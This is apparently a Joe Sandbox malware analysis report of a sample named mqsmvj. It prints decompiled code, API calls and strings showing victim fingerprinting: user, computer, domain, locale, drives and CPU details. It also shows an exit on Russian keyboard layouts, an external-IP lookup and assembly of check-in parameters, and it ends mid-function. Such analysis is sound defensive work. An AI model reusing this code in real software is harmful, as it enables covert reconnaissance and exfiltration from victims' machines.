Opcode ID: a52cbff2c27e979b36c29fba00ac919e2c99f034448eca46c93e16e552cefa8c
Instruction ID: b5be798d32ed43a2c8bd127696d2c4888455d0adb587606371de88e77df44b43
Opcode Fuzzy Hash: a52cbff2c27e979b36c29fba00ac919e2c99f034448eca46c93e16e552cefa8c
Instruction Fuzzy Hash: FB21AA32A04219BBEB109E98AD85FE97BBCFB44711F1041A7FE04F6180DB75A9179B90

Uniqueness

Uniqueness Score: -1.00%

Function 0F586FF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 0F587E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F588024
Part of subcall function 0F587E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F58803D

VirtualAlloc.KERNELBASE(00000000,00002801,00003000,00000040,772966A0,?), ref: 0F58700F
lstrlenW.KERNEL32(0F58FF8C), ref: 0F58701C

Part of subcall function 0F588050: InternetCloseHandle.WININET(?), ref: 0F588063
Part of subcall function 0F588050: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F588082

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0F58FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F58704B
wsprintfW.USER32 ref: 0F587063
VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0F58FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F587079
InternetCloseHandle.WININET(?), ref: 0F587087

Strings

GET, xrefs: 0F587024
ipv4bot.whatismyipaddress.com, xrefs: 0F58703C

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: 0c180487e40f81efb48875a502565e08e758f79153bc13230f9dba7b0c1b6f9f
Instruction ID: 0cc39304379ec535d5ec06b0a30b34a82d2ee5a76a94162813642de8c3bf72e4
Opcode Fuzzy Hash: 0c180487e40f81efb48875a502565e08e758f79153bc13230f9dba7b0c1b6f9f
Instruction Fuzzy Hash: F5019235740204BBD6207A75AD4EF9B3F68BB89B62F100035FA05F1181DB68952BD6A5

Uniqueness

Uniqueness Score: -1.00%

Function 0F587490 Relevance: 144.0, APIs: 55, Strings: 27, Instructions: 499
memorystringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E0F587490(DWORD* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t154;
				long _t155;
				WCHAR* _t157;
				short _t158;
				short _t159;
				short _t160;
				signed int _t161;
				signed int _t164;
				signed int _t166;
				int _t178;
				void* _t181;
				signed int _t183;
				signed int _t186;
				WCHAR* _t190;
				void* _t191;
				void* _t199;
				_Unknown_base(*)()* _t204;
				signed int _t211;
				intOrPtr _t216;
				WCHAR* _t218;
				WCHAR* _t220;
				void* _t221;
				void* _t224;
				WCHAR* _t226;
				long _t229;
				int _t230;
				long _t234;
				void* _t238;
				long _t240;
				long _t243;
				WCHAR* _t246;
				void* _t247;
				WCHAR* _t249;
				WCHAR* _t250;
				WCHAR* _t252;
				void* _t256;
				DWORD* _t260;
				short* _t261;
				DWORD* _t266;
				void* _t267;
				signed int _t270;
				void* _t274;
				void* _t276;
				void* _t277;
				DWORD* _t279;
				void* _t280;
				void* _t281;

				_t267 = __edx;
				_t260 = __ecx;
				_t279 = __ecx;
				if( *__ecx != 0) {
					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 8) = _t252;
					_v24 = 0x100;
					GetUserNameW(_t252, _t260); // executed
				}
				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
					_v24 = 0x1e;
					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 0x14) = _t250;
					GetComputerNameW(_t250, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
					L11:
					if( *(_t279 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
							L31:
							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
								_push(_t260);
								 *(_t279 + 0x50) = _t220;
								_t221 = E0F587410(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80); // executed
								if(_t221 == 0) {
									_push(_t260);
									E0F587410(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
									wsprintfW( *(_t279 + 0x50), L"error");
									_t281 = _t281 + 8;
								}
							}
							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
								L44:
								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
									_v28 = 0;
									_t216 = E0F587B70(_t279 + 0x2c,  &_v28); // executed
									if(_t216 == 0) {
										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
									}
								}
								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x68) = _t190;
									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
									_t276 = _t191;
									GetWindowsDirectoryW(_t276, 0x100);
									_t66 = _t276 + 0x600; // 0x600
									_t266 = _t66;
									 *((short*)(_t276 + 6)) = 0;
									_t68 = _t276 + 0x400; // 0x400
									_t69 = _t276 + 0x604; // 0x604
									_t70 = _t276 + 0x608; // 0x608
									_t71 = _t276 + 0x200; // 0x200
									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
									_push(_t266);
									_t72 = _t276 + 0x60c; // 0x60c
									_t260 = _t72;
									_t199 = E0F587410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
									if(_t199 != 0) {
										_t73 = _t276 + 0x60c; // 0x60c
										_t211 = lstrlenW(_t73);
										_t74 = _t276 + 0x60c; // 0x60c
										_t260 = _t74;
										_push(_t260);
										E0F587410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
									}
									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
									_t79 = _t276 + 0x60c; // 0x60c
									_t281 = _t281 + 0xc;
									lstrcatW( *(_t279 + 0x68), _t79);
									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
									_v28 = _t204;
									if(_t204 == 0) {
										 *(_t279 + 0x6c) = 0;
									} else {
										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
									}
									 *(_t279 + 0x70) =  *(_t276 + 0x600);
									VirtualFree(_t276, 0, 0x8000); // executed
								}
								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
									L67:
									if( *(_t279 + 0x80) == 0) {
										L72:
										return 1;
									}
									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
									 *(_t279 + 0x84) = _t154;
									if(_t154 == 0) {
										L71:
										 *(_t279 + 0x80) = 0;
										goto L72;
									}
									_push(_t260);
									_t155 = E0F586FF0(_t154); // executed
									if(_t155 != 0) {
										goto L72;
									}
									VirtualFree( *(_t279 + 0x84), _t155, 0x8000); // executed
									goto L71;
								} else {
									_v68 = L"UNKNOWN";
									_v64 = L"NO_ROOT_DIR";
									_v60 = L"REMOVABLE";
									_v56 = L"FIXED";
									_v52 = L"REMOTE";
									_v48 = L"CDROM";
									_v44 = L"RAMDISK";
									_t157 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x7c) = _t157;
									_t261 =  &_v132;
									_t158 = 0x41;
									do {
										 *_t261 = _t158;
										_t261 = _t261 + 2;
										_t158 = _t158 + 1;
									} while (_t158 <= 0x5a);
									_t159 =  *L"?:\\"; // 0x3a003f
									_v40 = _t159;
									_t160 =  *0xf58f350; // 0x5c
									_v36 = _t160;
									_t161 = 0;
									_v24 = 0;
									do {
										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
										_t164 = GetDriveTypeW( &_v40); // executed
										_t270 = _t164;
										if(_t270 > 2 && _t270 != 5) {
											_v36 = 0;
											lstrcatW( *(_t279 + 0x7c),  &_v40);
											_v36 = 0x5c;
											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
											lstrcatW( *(_t279 + 0x7c), "_");
											_t178 = GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16); // executed
											if(_t178 == 0) {
												lstrcatW( *(_t279 + 0x7c), L"0,");
												goto L64;
											}
											_v8 = E0F588AB0(_v16, 0, _v28 * _v20, 0);
											_t256 = _t267;
											_t181 = E0F588AB0(_v12, 0, _v28 * _v20, 0);
											_t274 = _v8;
											_v32 = _t274 - _t181;
											asm("sbb eax, edx");
											_v8 = _t256;
											_t183 = lstrlenW( *(_t279 + 0x7c));
											_push(_t256);
											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
											_t186 = lstrlenW( *(_t279 + 0x7c));
											_push(_v8);
											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
											_t281 = _t281 + 0x20;
											lstrcatW( *(_t279 + 0x7c), ",");
										}
										_t161 = _v24 + 1;
										_v24 = _t161;
									} while (_t161 < 0x1b);
									_t166 = lstrlenW( *(_t279 + 0x7c));
									_t260 =  *(_t279 + 0x7c);
									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
									goto L67;
								}
							} else {
								__imp__GetNativeSystemInfo( &_v76); // executed
								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
								_t260 = _v76 & 0x0000ffff;
								 *(_t279 + 0x5c) = _t218;
								if(_t260 > 9) {
									L42:
									_push(L"Unknown");
									L43:
									wsprintfW(_t218, ??);
									_t281 = _t281 + 8;
									goto L44;
								}
								_t260 =  *(_t260 + E0F587B60) & 0x000000ff;
								switch( *((intOrPtr*)(_t260 * 4 +  &M0F587B4C))) {
									case 0:
										_push(L"x86");
										goto L43;
									case 1:
										_push(L"ARM");
										goto L43;
									case 2:
										_push(L"Itanium");
										goto L43;
									case 3:
										_push(L"x64");
										goto L43;
									case 4:
										goto L42;
								}
							}
						}
						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
						_v8 = _t224;
						_v20 = _t224 + 0xe;
						_t226 = VirtualAlloc(0, 4, 0x3000, 4); // executed
						 *(_t279 + 0x44) = _t226;
						_t277 = 1;
						_v24 = 1;
						do {
							wsprintfW(_v8, L"%d", _t277);
							_t281 = _t281 + 0xc;
							_v16 = 0;
							_t277 = _t277 + 1;
							_t229 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12); // executed
							if(_t229 != 0) {
								L27:
								_t230 = 0;
								_v24 = 0;
								goto L28;
							}
							_v28 = 0x80;
							_t234 = RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28); // executed
							if(_t234 != 0) {
								GetLastError();
							} else {
								_v16 = 1;
							}
							RegCloseKey(_v12); // executed
							if(_v16 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v20, L"00000419") == 0) {
									_t218 = wsprintfW( *(_t279 + 0x44), "1");
									_t281 = _t281 + 8;
									ExitProcess(0);
								}
								_t230 = _v24;
							}
							L28:
						} while (_t277 != 9 && _t230 != 0);
						wsprintfW( *(_t279 + 0x44), "0");
						_t281 = _t281 + 8;
						VirtualFree(_v8, 0, 0x8000); // executed
						goto L31;
					}
					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					_v20 = _t238;
					 *(_t279 + 0x38) = _t238;
					_v12 = 0;
					_t240 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8); // executed
					if(_t240 != 0) {
						L17:
						 *(_t279 + 0x30) = 0;
						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v24 = 0x40;
					_t243 = RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24); // executed
					if(_t243 != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v8); // executed
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t279 + 0x20) = _t246;
					if(_t246 == 0) {
						goto L11;
					}
					_push(_t260);
					_t247 = E0F587410(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
					if(_t247 == 0) {
						wsprintfW( *(_t279 + 0x20), L"undefined");
						L10:
						_t281 = _t281 + 8;
						goto L11;
					}
					_t249 =  *(_t279 + 0x20);
					if( *_t249 != 0) {
						goto L11;
					}
					wsprintfW(_t249, L"WORKGROUP");
					goto L10;
				}
			}

APIs

VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004), ref: 0F5874B7
GetUserNameW.ADVAPI32(00000000,?), ref: 0F5874C8
VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004), ref: 0F5874E6
GetComputerNameW.KERNEL32 ref: 0F5874F0
VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F587510
wsprintfW.USER32 ref: 0F587551
VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F58756E
RegOpenKeyExW.KERNELBASE(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F587592
RegQueryValueExW.KERNELBASE(00000000,LocaleName,00000000,00000000,0F584810,?), ref: 0F5875B6
GetLastError.KERNEL32 ref: 0F5875C9
RegCloseKey.KERNELBASE(00000000), ref: 0F5875D2
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F5875EF
VirtualAlloc.KERNELBASE(00000000,0000008A,00003000,00000004), ref: 0F58760D
VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004), ref: 0F587623
wsprintfW.USER32 ref: 0F58763D
RegOpenKeyExW.KERNELBASE(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0F58765F
RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,0F584810,?), ref: 0F587681
GetLastError.KERNEL32 ref: 0F587694
RegCloseKey.KERNELBASE(?), ref: 0F58769D
lstrcmpiW.KERNEL32(0F584810,00000419), ref: 0F5876B1
wsprintfW.USER32 ref: 0F5876DE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5876ED
VirtualAlloc.KERNELBASE(00000000,00000082,00003000,00000004), ref: 0F58770D
wsprintfW.USER32 ref: 0F587756
GetNativeSystemInfo.KERNELBASE(?), ref: 0F587765
VirtualAlloc.KERNELBASE(00000000,00000040,00003000,00000004), ref: 0F587776
wsprintfW.USER32 ref: 0F58779A
ExitProcess.KERNEL32 ref: 0F5877A1
wsprintfW.USER32 ref: 0F5877C9
VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0F587807
VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 0F58781A
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0F587824
GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0F58785E
lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587890
wsprintfW.USER32 ref: 0F5878C8
lstrcatW.KERNEL32(?,0000060C), ref: 0F5878DD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0F5878E9
GetProcAddress.KERNEL32(00000000), ref: 0F5878F0
lstrlenW.KERNEL32(?), ref: 0F587900
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F587931

Part of subcall function 0F587B70: VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0F587B8D
Part of subcall function 0F587B70: VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004), ref: 0F587C01
Part of subcall function 0F587B70: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F587C16
Part of subcall function 0F587B70: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F587C2C

VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0F587988
GetDriveTypeW.KERNELBASE(?), ref: 0F5879CF
lstrcatW.KERNEL32(?,?), ref: 0F5879F6
lstrcatW.KERNEL32(?,0F59030C), ref: 0F587A08
lstrcatW.KERNEL32(?,0F590380), ref: 0F587A12
GetDiskFreeSpaceW.KERNELBASE(?,?,0F584810,?,00000000), ref: 0F587A28
lstrlenW.KERNEL32(?,?,00000000,0F584810,00000000,00000000,00000000,0F584810,00000000), ref: 0F587A70
wsprintfW.USER32 ref: 0F587A8A
lstrlenW.KERNEL32(?), ref: 0F587A98
wsprintfW.USER32 ref: 0F587AAC
lstrcatW.KERNEL32(?,0F5903A0), ref: 0F587ABF
lstrcatW.KERNEL32(?,0F5903A4), ref: 0F587ACB
lstrlenW.KERNEL32(?), ref: 0F587AE6
VirtualAlloc.KERNELBASE(00000000,00000081,00003000,00000004), ref: 0F587B09
VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 0F587B30

Strings

undefined, xrefs: 0F587549
ARM, xrefs: 0F5877AE
?:\, xrefs: 0F5879AD
@, xrefs: 0F58759F
Unknown, xrefs: 0F5877C3
LocaleName, xrefs: 0F5875AE
%I64u/, xrefs: 0F587A84
productName, xrefs: 0F587716, 0F58773A
x86, xrefs: 0F5877BC
Keyboard Layout\Preload, xrefs: 0F587655
WORKGROUP, xrefs: 0F587541
ntdll.dll, xrefs: 0F5878E4
i)w, xrefs: 0F5876B1
x64, xrefs: 0F5877A7
Control Panel\International, xrefs: 0F587581
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0F58771B
%I64u, xrefs: 0F587AA3
SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 0F587525
Domain, xrefs: 0F587520
Itanium, xrefs: 0F5877B5
ProcessorNameString, xrefs: 0F587871
00000419, xrefs: 0F5876A9
Identifier, xrefs: 0F5878A6
RtlComputeCrc32, xrefs: 0F5878DF
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 0F58773F
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0F587876, 0F5878AB
error, xrefs: 0F58774E

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
String ID: i)w$%I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 153366582-3138453034
Opcode ID: db598fd2247acd5e6e387bbb91f9700466951a2b3789d0d5468cdaf3fc115aab
Instruction ID: f5e740bde8b69a31add8ab3e31f9ba906fc42162dc3dd32bb0a4b36d1f2c38c9
Opcode Fuzzy Hash: db598fd2247acd5e6e387bbb91f9700466951a2b3789d0d5468cdaf3fc115aab
Instruction Fuzzy Hash: 2C12C170640305FBEB24AFA4DD45FAABBB4FF08701F200929F641B62D1D7B4A516DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0F587E40 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F587E40(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F588024
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F58803D

Strings

p, xrefs: 0F587F23
3, xrefs: 0F58801D
d, xrefs: 0F587EB5
), xrefs: 0F587F0F
5, xrefs: 0F587F52
, xrefs: 0F587EC9
e, xrefs: 0F587F2D
h, xrefs: 0F587FB4
3, xrefs: 0F587FE5
K, xrefs: 0F587F41
o, xrefs: 0F587FBB
8, xrefs: 0F587FDE
6, xrefs: 0F587F05
T, xrefs: 0F587ED3
G, xrefs: 0F587F98
5, xrefs: 0F58800F
5, xrefs: 0F587E8D
, xrefs: 0F587EF1
M, xrefs: 0F587E64
7, xrefs: 0F588016
i, xrefs: 0F587F8A
6, xrefs: 0F587EDD
1, xrefs: 0F587EE7
A, xrefs: 0F587F19
e, xrefs: 0F587F37
3, xrefs: 0F587F60
7, xrefs: 0F587F59
, xrefs: 0F587FAD
0, xrefs: 0F587E97
a, xrefs: 0F588001
, xrefs: 0F587FF3
, xrefs: 0F587F67
l, xrefs: 0F587E79
T, xrefs: 0F587F75
z, xrefs: 0F587E6F
8, xrefs: 0F587FEC
a, xrefs: 0F587FFA
c, xrefs: 0F587F9F
., xrefs: 0F587FD0
o, xrefs: 0F587FA6
e, xrefs: 0F587F91
i, xrefs: 0F588008
w, xrefs: 0F587EBF
K, xrefs: 0F587F6E
t, xrefs: 0F587F4B
, xrefs: 0F587F83
e, xrefs: 0F587FC2
5, xrefs: 0F587FC9
(, xrefs: 0F587EA1
., xrefs: 0F587FD7
O, xrefs: 0F587EFB
L, xrefs: 0F587F7C
a, xrefs: 0F587E83
i, xrefs: 0F587EAB

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: 43eda7eb153750cf251a9508cb1ede0c79da4b0e82fd346071d385916bd76b98
Instruction ID: 5672efb346f68e9b87db7bb9083adcb45b8cdd0991eab0da747c6c53c0f5ba0e
Opcode Fuzzy Hash: 43eda7eb153750cf251a9508cb1ede0c79da4b0e82fd346071d385916bd76b98
Instruction Fuzzy Hash: 2B4197B4811358DEEB258F91999879EBFF5BB04748F50819ED5087B201C7F60A89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0F5870A0 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F5870A0(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
